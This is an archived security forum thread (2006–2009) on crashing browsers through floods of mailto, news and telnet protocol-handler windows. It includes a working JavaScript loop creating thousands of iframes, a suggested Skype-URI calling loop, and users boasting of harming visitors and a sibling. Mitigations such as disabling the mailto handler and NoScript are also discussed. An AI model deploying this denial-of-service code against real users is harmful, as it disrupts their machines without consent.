Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Memory exhaustion via mailto tags
Posted by: rsnake
Date: August 21, 2006 12:24PM

One of the things I built was the mailto tag popup DoS located here: http://ha.ckers.org/weird/popup.html

I was playing around with other ways to do this, like perhaps include things like news:// or other directives that could spawn additional resources towards the end goal of memory exhaustion or otherwise getting the user so confused that they cannot stop whatever is happening. I have a feeling there is an exploit buried in here, beyond buffer overflows, but actually through the art of confusion and user panic.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: September 01, 2006 08:01PM

Well my stupid little mailto DoS got on Digg (waaaaay down the page). In one day a thousand people went to that page. 1000 people had their day ruined: http://www.digg.com/security/How_To_Crash_Internet_Explorer

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: WhiteAcid
Date: September 01, 2006 09:27PM

Go to about:config, set network.protocol-handler.external.mailto to false. Firefox will no longer have mailto: do anything.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Date: September 02, 2006 10:59AM

Hmm... I might just do that, even though it also disables somewhat useful mailto links. It takes way to long for Thunderbird to boot up anyway.

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: September 02, 2006 12:04PM

Thank you, WhiteAcid, that's great... I accidentally nailed myself with my own script the other day. Even though I caught it almost immediately it had enough time to still spawn about 50 windows. Ugh!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: Moccah
Date: July 01, 2007 04:59PM

Still, while setting network.protocol-handler.external.mailto to false, firefox crashes. I guess this is because there is a script that loops the <IFRAME></IFRAME> tag an awful lot of times?

If i stop the page load, Firefox hangs abit and eats up all of my CPU for a short period, but eventually it drops and gets normal.


Man, I got annoyed when i clicked the link .. (do'h) Oh well, long live the curiosity :P



Edited 1 time(s). Last edit at 07/01/2007 05:07PM by Moccah.

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: Kyran
Date: September 25, 2007 09:49PM

I never should have told RSnake to add that damn refresh. Even being safe from the mailto crash, that page kills me too.

- Kyran

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: December 09, 2007 09:40PM

hahah... not super practical but good for a laugh.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: kefka
Date: April 17, 2008 11:25AM

For the record, it's even more painful if your default application is something monstrous (like Lotus Notes).

Just imagine, I'm sure you'll chuckle.

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: Metahuman
Date: May 08, 2008 08:45AM

Erm, this seems to have been fixed with the newer version of FireFox.

meta-human.net

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: June 09, 2008 10:22AM

How is it fixed out of curiosity? Can it only instantiate it once or something?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: trev
Date: July 03, 2008 07:37AM

Nope, doesn't seem fixed.

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: asilvermtzion
Date: August 15, 2008 04:48PM

Haha, tested this on my brother, it spawned enough IE windows that the only way out was a reboot. How the heck does it work even with javascript disabled?

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: PaPPy
Date: August 17, 2008 11:13AM

javascript has nothing to do with mailto: its how your browser/mail client handles when a mailto link is launched

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: ma1
Date: August 17, 2008 12:00PM

@RSnake, Metahuman, trev:
maybe Metahuman believed it was fixed because he's using NoScript, which has been blocking this kind of "attack" (automatic opening of external protocol URLs) for a long time.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: p0deje
Date: September 22, 2009 10:39AM

I've coded one more thing that definitely makes user to panic, but it works in Safari on Windows only, because it allows to open external Telnet applications.
Maybe it also works on MacOS - I haven't been able to test.
Try it in your Safari :) combined with mailto confusion it becomes totally cool thing. Going to post it at blog.
Besides, I think there are some ways to seriously exploit external applications handler in Safari. Maybe play around with file:/// or smth like?
<body />
<script>
    function makeFrameTelnet() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'telnet://nonexistent.com:80';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    function makeFrameNews() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'news://nonexistent.com';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    for (i=0; i < 9999; i++) {
    makeFrameTelnet()
    makeFrameNews()
    }
</script>

---------
http://p0deje.blogspot.com

Options: ReplyQuote
Re: Memory exhaustion via mailto tags
Posted by: p0deje
Date: September 24, 2009 06:00AM

External applications handler is really sucks in Safari (and in IE too)
For example using iframe with src="skype:echo123?call" in infinite loop makes Skype to call there
It seems that there are certain ways for spamming using Safari and Skype URI

---------
http://p0deje.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.